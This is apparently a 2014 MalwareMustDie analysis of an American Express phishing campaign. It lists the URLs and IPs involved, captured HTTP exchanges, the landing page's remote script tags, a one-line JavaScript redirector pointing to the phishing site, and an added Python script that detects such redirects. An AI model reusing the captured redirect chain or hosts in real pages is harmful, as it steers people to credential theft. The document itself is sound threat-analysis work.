- // #MalwareMustDie! $ date
- // Sat Apr 12 13:28:40 JST 2014
- // Case: American Express Phishing April 12 2014
- // Analysis base: http://blog.malwaremustdie.org/2014/02/one-upn-time-with-american-express.html
- // Landings:
- // Remote Scripts:
- http://bvh.cwsurf.de/slogan/transplant.js 85.195.104.20
- http://debbixler.com/pulley/lifeguard.js 72.167.186.171
- http://electricwinches.co.uk/lofting/retiring.js 91.186.1.215
- http://mcnabconstruction.com/morton/cetaceans.js 91.186.1.166
- // Phishing site:
- http://218.234.108.131:8080/americanexpress/ 218.234.108.131
- // IP complete translation (Reverse|ISP|Location)
- // The Landing PoC
- GET /hellishly/flotilla.html HTTP/1.1
- Host: www.inversionesdecolombia.co
- Referer: http://MalwareMustDieHatesPhishing.org
- :
- HTTP/1.1 200 OK
- Date: Sat, 12 Apr 2014 04:17:12 GMT
- Server: Apache/2.4.6 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
- Last-Modified: Fri, 11 Apr 2014 15:15:26 GMT
- Accept-Ranges: bytes
- Content-Length: 532
- Connection: close
- Content-Type: text/html
- 200 OK
- Length: 532 [text/html]
- Saving to: './sample.mmd'
- // The Remote Script PoC
- $ cat sample.mmd
- <html>
- <table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
- <script type="text/javascript" src="http://bvh.cwsurf.de/slogan/transplant.js"></script>
- <script type="text/javascript" src="http://debbixler.com/pulley/lifeguard.js"></script>
- <script type="text/javascript" src="http://electricwinches.co.uk/lofting/retiring.js"></script>
- <script type="text/javascript" src="http://mcnabconstruction.com/morton/cetaceans.js"></script>
- </html>
- // The Script Redirector PoC
- Resolving bvh.cwsurf.de (bvh.cwsurf.de)... 85.195.104.20
- Caching bvh.cwsurf.de => 85.195.104.20
- Connecting to bvh.cwsurf.de (bvh.cwsurf.de)|85.195.104.20|:80... connected.
- GET /slogan/transplant.js HTTP/1.1
- Referer: http://pointcanada.com/lakshmi/specter.html
- Host: bvh.cwsurf.de
- :
- HTTP/1.1 200 OK
- Date: Sat, 12 Apr 2014 04:14:29 GMT
- Server: Apache
- Last-Modified: Fri, 11 Apr 2014 22:59:02 GMT
- ETag: "90c011c-41-4f6cc479c1af1"
- Accept-Ranges: bytes
- Content-Length: 65
- Connection: close
- Content-Type: application/javascript
- 200 OK
- Length: 65 [application/javascript]
- Saving to: './sample.mmd'
- $ cat sample.mmd
- document.location='http://218.234.108.131:8080/americanexpress/';
- // The rest of the information is similar to the posted blog.
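The two captures above (the landing HTML and the 65-byte redirector script) are enough for a defender to write a small triage check. This is an added example, not part of the original paste: it lists the third-party hosts a landing page loads scripts from, extracts the literal target of a bare `document.location` redirector, and flags the redirect when it points at a raw IP on a non-standard port, the pattern seen in this case. The two sample strings are copies of the page's own captures, embedded so the script runs offline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed copies of the two artefacts shown in the PoCs above: the landing
# page body (first sample.mmd) and the redirector script it loads (second sample.mmd).
LANDING_HTML = """<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
<script type="text/javascript" src="http://bvh.cwsurf.de/slogan/transplant.js"></script>
<script type="text/javascript" src="http://debbixler.com/pulley/lifeguard.js"></script>
<script type="text/javascript" src="http://electricwinches.co.uk/lofting/retiring.js"></script>
<script type="text/javascript" src="http://mcnabconstruction.com/morton/cetaceans.js"></script>
</html>"""

REDIRECTOR_JS = "document.location='http://218.234.108.131:8080/americanexpress/';"


class ScriptSrcParser(HTMLParser):
    """Collects the src attribute of every <script> tag (tolerates stray tags like the </a>)."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def external_script_hosts(html, page_host):
    """Return the set of hosts, other than the page's own, that it pulls <script> from."""
    parser = ScriptSrcParser()
    parser.feed(html)
    hosts = {urlparse(src).hostname for src in parser.srcs}
    return {h for h in hosts if h and h != page_host}


# Matches document.location / window.location(.href) assigned a literal string.
_REDIRECT_RE = re.compile(r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


def redirect_target(js):
    """Return the URL a bare location-assignment redirector sends the browser to, or None."""
    match = _REDIRECT_RE.search(js)
    return match.group(1) if match else None


def is_suspicious_redirect(url):
    """Heuristic from this case: the target is a raw IPv4 address on a non-standard port."""
    parsed = urlparse(url)
    ip_like = re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", parsed.hostname or "") is not None
    return ip_like and parsed.port not in (None, 80, 443)
```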
- ---
- #MalwareMUSTDie!
- Analysis: @unixfreaxjp